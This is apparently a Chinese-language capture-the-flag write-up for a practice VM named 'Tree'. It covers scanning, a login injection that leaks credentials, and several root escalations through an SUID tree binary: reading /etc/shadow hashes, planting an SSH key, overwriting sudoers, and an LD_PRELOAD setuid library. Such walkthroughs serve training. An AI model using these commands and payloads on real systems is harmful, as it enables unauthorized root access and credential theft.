Tree

靶机说明

QQ群：660930334

一、主机探测

┌──(root㉿kali)-[/miao/maze-sec/tree]
└─# nmap -sn 192.168.2.0/24              
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-13 21:32 CST
Nmap scan report for 192.168.2.1
Host is up (0.00047s latency).
MAC Address: 0A:00:27:00:00:0A (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00054s latency).
MAC Address: 08:00:27:D1:C4:24 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.56
Host is up (0.00051s latency).
MAC Address: 08:00:27:F1:AB:D3 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.11 seconds

靶机IP：192.168.2.56

二、端口扫描

1、全端口扫描

┌──(root㉿kali)-[/miao/maze-sec/tree]
└─# nmap --min-rate 10000 -p- 192.168.2.56                    
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-13 21:33 CST
Nmap scan report for 192.168.2.56
Host is up (0.00014s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:F1:AB:D3 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 3.65 seconds

开放端口：22,80

2、详细信息扫描

┌──(root㉿kali)-[/miao/maze-sec/tree]
└─# nmap --min-rate 10000 -sT -sV -sC -O -p22,80 192.168.2.56
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-13 21:33 CST
Nmap scan report for 192.168.2.56
Host is up (0.00093s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.62 (Debian)
MAC Address: 08:00:27:F1:AB:D3 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.66 seconds

3、UDP端口扫描

┌──(root㉿kali)-[/miao/maze-sec/tree]
└─# nmap -sU --top-ports 100 192.168.2.56                    
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-13 21:34 CST
Nmap scan report for 192.168.2.56
Host is up (0.00047s latency).
All 100 scanned ports on 192.168.2.56 are in ignored states.
Not shown: 60 closed udp ports (port-unreach), 40 open|filtered udp ports (no-response)
MAC Address: 08:00:27:F1:AB:D3 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 55.94 seconds

没有开放的端口

三、WEB渗透

访问80端口，发现是一个用户搜索系统

1、目录扫描

┌──(root㉿kali)-[/miao/maze-sec/tree]
└─# gobuster dir -u http://192.168.2.56/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,html,bak
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.2.56/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              html,bak,php,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 277]
/.html                (Status: 403) [Size: 277]
/index.php            (Status: 200) [Size: 272]
/.php                 (Status: 403) [Size: 277]
/.html                (Status: 403) [Size: 277]
/server-status        (Status: 403) [Size: 277]
Progress: 1102800 / 1102805 (100.00%)
===============================================================
Finished
===============================================================

没有找到其他的目录

2、Xpath注入

尝试输入用户名，发现后面拼接着?username=

猜测可能存在SQL注入，直接万能语句' or '1'='1，找到用户yolo以及密码06f5086772e0

四、获取yolo权限

直接使用账号和密码进行连接

┌──(root㉿kali)-[/miao/maze-sec/tree]
└─# ssh yolo@192.168.2.56                                       
yolo@192.168.2.56's password: 
Linux Tree 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
yolo@Tree:~$ id 
uid=1000(yolo) gid=1000(yolo) groups=1000(yolo)

USER FLAG

yolo@Tree:~$ cat user.txt 
flag{user-df31759540dc28f75a20f443a19b1148}

五、权限提升

使用sudo -l，发现需要密码

yolo@Tree:~$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for yolo: 
sudo: a password is required

在home目录下，找到另外一个用户cnext

yolo@Tree:/$ ls -la /home
total 16
drwxr-xr-x  4 root  root  4096 Jul 11 07:53 .
drwxr-xr-x 18 root  root  4096 Mar 18 20:37 ..
drwx------  2 cnext cnext 4096 Jul 11 07:54 cnext
drwxr-xr-x  2 yolo  yolo  4096 Jul 11 08:05 yolo

查看具有suid的文件，找到/usr/bin/tree

yolo@Tree:~$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/su
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/tree
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/libexec/polkit-agent-helper-1

Tree提权

查看/usr/bin/tree的使用文档

yolo@Tree:~$ /usr/bin/tree --help
usage: tree [-acdfghilnpqrstuvxACDFJQNSUX] [-H baseHREF] [-T title ]
        [-L level [-R]] [-P pattern] [-I pattern] [-o filename] [--version]
        [--help] [--inodes] [--device] [--noreport] [--nolinks] [--dirsfirst]
        [--charset charset] [--filelimit[=]#] [--si] [--timefmt[=]<f>]
        [--sort[=]<name>] [--matchdirs] [--ignore-case] [--fromfile] [--]
        [<directory list>]
  ------- Listing options -------
  -a            All files are listed.
  -d            List directories only.
  -l            Follow symbolic links like directories.
  -f            Print the full path prefix for each file.
  -x            Stay on current filesystem only.
  -L level      Descend only level directories deep.
  -R            Rerun tree when max dir level reached.
  -P pattern    List only those files that match the pattern given.
  -I pattern    Do not list files that match the given pattern.
  --ignore-case Ignore case when pattern matching.
  --matchdirs   Include directory names in -P pattern matching.
  --noreport    Turn off file/directory count at end of tree listing.
  --charset X   Use charset X for terminal/HTML and indentation line output.
  --filelimit # Do not descend dirs with more than # files in them.
  --timefmt <f> Print and format time according to the format <f>.
  -o filename   Output to file instead of stdout.
  ------- File options -------
  -q            Print non-printable characters as '?'.
  -N            Print non-printable characters as is.
  -Q            Quote filenames with double quotes.
  -p            Print the protections for each file.
  -u            Displays file owner or UID number.
  -g            Displays file group owner or GID number.
  -s            Print the size in bytes of each file.
  -h            Print the size in a more human readable way.
  --si          Like -h, but use in SI units (powers of 1000).
  -D            Print the date of last modification or (-c) status change.
  -F            Appends '/', '=', '*', '@', '|' or '>' as per ls -F.
  --inodes      Print inode number of each file.
  --device      Print device ID number to which each file belongs.
  ------- Sorting options -------
  -v            Sort files alphanumerically by version.
  -t            Sort files by last modification time.
  -c            Sort files by last status change time.
  -U            Leave files unsorted.
  -r            Reverse the order of the sort.
  --dirsfirst   List directories before files (-U disables).
  --sort X      Select sort: name,version,size,mtime,ctime.
  ------- Graphics options -------
  -i            Don't print indentation lines.
  -A            Print ANSI lines graphic indentation lines.
  -S            Print with CP437 (console) graphics indentation lines.
  -n            Turn colorization off always (-C overrides).
  -C            Turn colorization on always.
  ------- XML/HTML/JSON options -------
  -X            Prints out an XML representation of the tree.
  -J            Prints out an JSON representation of the tree.
  -H baseHREF   Prints out HTML format with baseHREF as top directory.
  -T string     Replace the default HTML title and H1 header with string.
  --nolinks     Turn off hyperlinks in HTML output.
  ------- Input options -------
  --fromfile    Reads paths from files (.=stdin)
  ------- Miscellaneous options -------
  --version     Print version and exit.
  --help        Print usage and this help message and exit.
  --            Options processing terminator.

方法一：读取shadow

tree命令的--fromfile可以进行读取文件，读取/etc/shadow

yolo@Tree:/tmp$ /usr/bin/tree --fromfile -i /etc/shadow
ERROR: ld.so: object '/tmp/pe.so' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
/etc/shadow
_apt:*:20166:0:99999:7:::
backup:*:20166:0:99999:7:::
bin:*:20166:0:99999:7:::
cnext:$6$ZjmfcSILA.G5sfyX$F40LCYH.m1HpdKtDj2zZBxExp41bY1XE.WqmagM27SNF0X0ejkj4T5ys2PTPGaLdNNj2oGsJyJrh42J4J.gBq.:20280:0:99999:7:::
daemon:*:20166:0:99999:7:::
games:*:20166:0:99999:7:::
gnats:*:20166:0:99999:7:::
irc:*:20166:0:99999:7:::
list:*:20166:0:99999:7:::
lp:*:20166:0:99999:7:::
mail:*:20166:0:99999:7:::
man:*:20166:0:99999:7:::
messagebus:*:20166:0:99999:7:::
mysql:!:20280:0:99999:7:::
news:*:20166:0:99999:7:::
nobody:*:20166:0:99999:7:::
proxy:*:20166:0:99999:7:::
root:$6$gj1.TfiC99BG.F
4$6OvXSQ
hKLq7uGZEyMaXQwmhNV9hSBlsL.Y
Tojwh5wBlJU
gPeLmwiUo
dkHwBrenDpo253k6Eqq0Mu0qXtz.:20280:0:99999:7:::
sshd:*:20166:0:99999:7:::
sync:*:20166:0:99999:7:::
sys:*:20166:0:99999:7:::
systemd-coredump:!!:20166::::::
systemd-network:*:20166:0:99999:7:::
systemd-resolve:*:20166:0:99999:7:::
systemd-timesync:*:20166:0:99999:7:::
uucp:*:20166:0:99999:7:::
www-data:*:20166:0:99999:7:::
yolo:$6$Y6rR2ERG
lJ8f18x$HWqyDphsZc0zWb.9fVcoQpO9W9ytUKoud8bI30D7X
Nyo.89DLGVBbM2gDl3nuiE
jEMS0I7H1d.PifuJARrW
:20280:0:99999:7:::

9 directories, 28 files

找到哈希值

┌──(root㉿kali)-[/miao/maze-sec/tree]
└─# cat hash.txt | tr '\n' '/'
root:$6$gj1.TfiC99BG.F/4$6OvXSQ/hKLq7uGZEyMaXQwmhNV9hSBlsL.Y/Tojwh5wBlJU/gPeLmwiUo/dkHwBrenDpo253k6Eqq0Mu0qXtz.:20280:0:99999:7:::/                                                                                   
┌──(root㉿kali)-[/miao/maze-sec/tree]
└─# vi hash.txt

┌──(root㉿kali)-[/miao/maze-sec/tree]
└─# cat hash.txt              
root:$6$gj1.TfiC99BG.F/4$6OvXSQ/hKLq7uGZEyMaXQwmhNV9hSBlsL.Y/Tojwh5wBlJU/gPeLmwiUo/dkHwBrenDpo253k6Eqq0Mu0qXtz.:20280:0:99999:7:::/ 

使用john进行破解，即可

方法二：写私钥

• 生成私钥

  yolo@Tree:/tmp$ ssh-keygen -t ed25519
  Generating public/private ed25519 key pair.
  Enter file in which to save the key (/home/yolo/.ssh/id_ed25519):     
  Created directory '/home/yolo/.ssh'.
  Enter passphrase (empty for no passphrase): 
  Enter same passphrase again: 
  Your identification has been saved in /home/yolo/.ssh/id_ed25519
  Your public key has been saved in /home/yolo/.ssh/id_ed25519.pub
  The key fingerprint is:
  SHA256:6YV81WtNfALzmF6TX2c1xwtA5LxIfgvpB5NrJKUOF1o yolo@Tree
  The key's randomart image is:
  +--[ED25519 256]--+
  |          o++  oo|
  |          o  O o=|
  |       E o o+ O O|
  |      o.*o+o.. X+|
  |     o +SXoo. o o|
  |      +.+o* ..   |
  |       ..+ o     |
  |        . .      |
  |                 |
  +----[SHA256]-----+

• 查看私钥

  yolo@Tree:/tmp$ cat /home/yolo/.ssh/id_ed25519.pub 
  ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFqcIkl5fR2GPPr5t6rvJBm0U/5DaX5S36K0tw5B8fFz yolo@Tree

• 将私钥写入到/root下面

  yolo@Tree:/tmp$ /usr/bin/tree --fromfile -d 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFqcIkl5fR2GPPr5t6rvJBm0U/5DaX5S36K0tw5B8fFz yolo@Tree' -n --noreport -o /root/.ssh/authorized_keys
  Error opening ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFqcIkl5fR2GPPr5t6rvJBm0U/5DaX5S36K0tw5B8fFz yolo@Tree for reading.

• 连接

  yolo@Tree:/tmp$ ssh root@127.0.0.1
  
  The programs included with the Debian GNU/Linux system are free software;
  the exact distribution terms for each program are described in the
  individual files in /usr/share/doc/*/copyright.
  
  Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
  permitted by applicable law.
  Last login: Fri Jul 11 06:57:11 2025 from 192.168.3.94
  root@Tree:~# id
  uid=0(root) gid=0(root) groups=0(root)

方法三：sudoers写入

写入

yolo@Tree:/tmp$ vi sudoer
yolo@Tree:/tmp$ /usr/bin/tree --fromfile --noreport -i /tmp/sudoer
/tmp/sudoer
yolo ALL=(ALL) NOPASSWD: ALL

将文件写入到/etc/sudoers

yolo@Tree:/tmp$ /usr/bin/tree --fromfile --noreport -i /tmp/sudoer -o /etc/sudoers
yolo@Tree:/tmp$ sudo -l
/etc/sudoers:1:12: syntax error
/tmp/sudoer
User yolo may run the following commands on Tree:
    (ALL) NOPASSWD: ALL

进行提权

yolo@Tree:/tmp$ sudo /bin/bash -p
/etc/sudoers:1:12: syntax error
/tmp/sudoer
           ^
ERROR: ld.so: object '/tmp/pe.so' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
root@Tree:/tmp# id
uid=0(root) gid=0(root) groups=0(root)

方法三：LD_PRELOAD

Linux操作系统的动态链接库在加载过程中，动态链接器会先读取LD_PRELOAD环境变量和默认配置文件/etc/ld.so.preload，并将读取到的动态链接库文件进行预加载。即使程序不依赖这些动态链接库，LD_PRELOAD环境变量和/etc/ld.so.preload配置文件中指定的动态链接库依然会被加载，因为它们的优先级比LD_LIBRARY_PATH环境变量所定义的链接库查找路径的文件优先级要高，所以能够提前于用户调用的动态库载入。

简单来说LD_PRELOAD的加载是最优先级的我们可以用他来做一些有趣的操作(骚操作).

一般情况下，ld-linux.so加载动态链接库的顺序为：
LD_PRELOAD > LD_LIBRARY_PATH > /etc/ld.so.cache > /lib > /usr/lib

编写提权文件

yolo@Tree:/tmp$ vi pe.c
yolo@Tree:/tmp$ cat pe.c 
#include<stdio.h>
#include<sys/types.h>
#include<stdlib.h>

void _init(){
        unlink("/etc/ld.so.preload");
        setgid(0);
        setuid(0);
        system("/bin/bash");
}

编译文件

yolo@Tree:/tmp$ gcc -fPIC -shared -o pe.so pe.c -nostartfiles
pe.c: In function ‘_init’:
pe.c:6:2: warning: implicit declaration of function ‘unlink’ [-Wimplicit-function-declaration]
    6 |  unlink("/etc/ld.so.preload");
      |  ^~~~~~
pe.c:7:2: warning: implicit declaration of function ‘setgid’ [-Wimplicit-function-declaration]
    7 |  setgid(0);
      |  ^~~~~~
pe.c:8:2: warning: implicit declaration of function ‘setuid’ [-Wimplicit-function-declaration]
    8 |  setuid(0);
      |  ^~~~~~

ROOT FLAG

root@Tree:~# cat root.txt 
flag{root-594359512f516a5f9c80930b6c388d10}

【总结】

1、Xpath注入

https://xz.aliyun.com/news/7386

2、Tree提权

--fromfile读取文件内容
-o写入文件
-i,--noreport清理写入数据

提权方法：

• 读取文件，如/etc/shadow
• 写入私钥
• 写入sudoers
• LD_PRELOAD共享库预加载